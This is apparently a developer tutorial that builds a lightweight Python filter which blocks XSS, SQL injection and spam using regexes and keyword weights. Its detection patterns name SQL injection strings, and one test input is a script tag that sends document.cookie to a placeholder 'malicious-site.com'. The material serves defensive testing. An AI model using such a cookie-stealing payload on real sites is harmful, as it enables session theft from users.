Building a High-Performance Content Safety & Abuse Analyzer in Pure Python
Building a High-Performance Content Safety & Abuse Analyzer in Pure Python
If you run a public app, database webhook, or community forum, user inputs can be messy. From SQL injection attempts to spam links, malicious text can break your application or compromise data privacy. Many teams immediately reach for cloud moderation APIs or run large text classification models to clean up inputs. However, routing every string over the cloud introduces network latency, costs money, and risks data leakage.
For high-traffic systems, you need speed. A defensive moderation layer shouldn't add 200ms to an HTTP request. By combining lightweight regex heuristics with a simple token weight system, you can handle over 95% of generic spam, injections, and text abuse locally in sub-millisecond times.
In this guide, we will build a production-grade content safety module from scratch in pure Python—no dependencies required.
Designing the Defensive Cascade Architecture
Instead of passing all text payloads straight to an LLM, a performant safety system uses a tiered approach. Think of it like a series of filters that get progressively more detailed:
- Tier 1: Heuristic Engine (Sub-millisecond): Runs pre-compiled patterns to instantly catch explicit blacklisted tokens, code attacks, and obvious spam patterns.
- Tier 2: Weighted Vector Scorer (Microsecond): Scores incoming sentences based on proximity matches to risk categories.
- Tier 3: Local AI Fallback (Millisecond): Sends suspicious, borderline cases to a local on-device LLM for deep contextual analysis.
Step 1: Coding the Heuristic Analyzer
Let's write the core engine class. This module pre-compiles regex expressions to catch injection footprints (like script inclusions or common SQL patterns) and scores texts using custom thresholds.
Create a file named safety_engine.py:
import re
class ContentSafetyEngine:
def __init__(self):
# Pre-compiling regex heuristics for structural threat speed execution
self.attack_patterns = {
"xss_injection": re.compile(r"<\s*script[^>]*>.*<\s*/\s*script\s*>", re.IGNORECASE | re.DOTALL),
"sql_injection": re.compile(r"UNION\s+SELECT|SELECT\s+.*\s+FROM|DROP\s+TABLE|OR\s+\d+=\d+", re.IGNORECASE),
"spam_url_bot": re.compile(r"(https?://\S*(?:bit\.ly|t\.co|get-rich|crypto-gift)\S*)", re.IGNORECASE)
}
# Weighted vocabulary indicator dictionary
self.risk_weights = {
"buy": 1.5, "crypto": 2.0, "free": 1.0, "casino": 2.5, "viagra": 3.0,
"earn": 1.5, "pills": 2.0, "invest": 1.8, "execute": 1.0, "grant": 1.0
}
def evaluate_payload(self, text):
"""Processes text inputs through the heuristic cascades and returns a safety report."""
report = {
"is_flagged": False,
"matched_triggers": [],
"risk_score": 0.0,
"recommended_action": "ALLOW"
}
if not text.strip():
return report
# Tier 1 Validation: Check core attack regex signatures
for threat_type, pattern in self.attack_patterns.items():
if pattern.search(text):
report["is_flagged"] = True
report["matched_triggers"].append(threat_type)
report["recommended_action"] = "BLOCK"
# Tier 2 Validation: Parse token vocabulary weights
words = re.findall(r'[a-zA-Z0-9]+', text.lower())
accumulated_score = 0.0
for word in words:
if word in self.risk_weights:
accumulated_score += self.risk_weights[word]
report["risk_score"] = round(accumulated_score, 2)
# Evaluate severity threshold barriers
if report["recommended_action"] != "BLOCK":
if accumulated_score >= 4.0:
report["is_flagged"] = True
report["matched_triggers"].append("high_risk_vocabulary")
report["recommended_action"] = "BLOCK"
elif accumulated_score >= 2.0:
report["is_flagged"] = True
report["matched_triggers"].append("medium_risk_review")
report["recommended_action"] = "FLAG_FOR_REVIEW"
return report
# Running functional checks
if __name__ == "__main__":
analyzer = ContentSafetyEngine()
# Test case 1: Clean developer text input
input_1 = "Hey team, can we review the documentation for the API controller updates tomorrow?"
print(f"Payload 1 Result: {analyzer.evaluate_payload(input_1)}\n")
# Test case 2: Cross-Site Scripting attack vector sample
input_2 = "Hello user! Check out this link: <script>fetch('http://malicious-site.com/steal?cookie=' + document.cookie)</script>"
print(f"Payload 2 Result: {analyzer.evaluate_payload(input_2)}\n")
# Test case 3: Typical high-risk spam profile pattern
input_3 = "Earn free passive income now! Buy our verified tokens to access casino options!"
print(f"Payload 3 Result: {analyzer.evaluate_payload(input_3)}\n")
Maximizing Safety Operations in High-Traffic Loops
When implementing a safety engine into an active routing layer, execution sequence matters. To minimize resource consumption, arrange your checks from the least demanding to the most intensive:
3 Execution Guidelines for Text Pre-processing:
- String Truncation Limits: Set a reasonable maximum character limit on user inputs before processing them. Analyzing multi-megabyte payloads in memory can cause thread bottlenecks or freeze your application.
- Early Exit Conditions: If a string triggers a critical blocker pattern (like an explicit code injection signature), exit the function immediately and skip the remaining checks.
- Pattern Compiling: Always pre-compile your regex structures using
re.compile()outside of your request functions. Compiling expressions inside an active HTTP route handler hurts performance under high traffic.
The Takeaway
You don't always need heavy cloud services or complex machine learning models to secure your application boundaries. Building a streamlined, independent text analyzer in pure Python lets you block malicious input instantly, protect user privacy, and keep cloud infrastructure costs at zero.
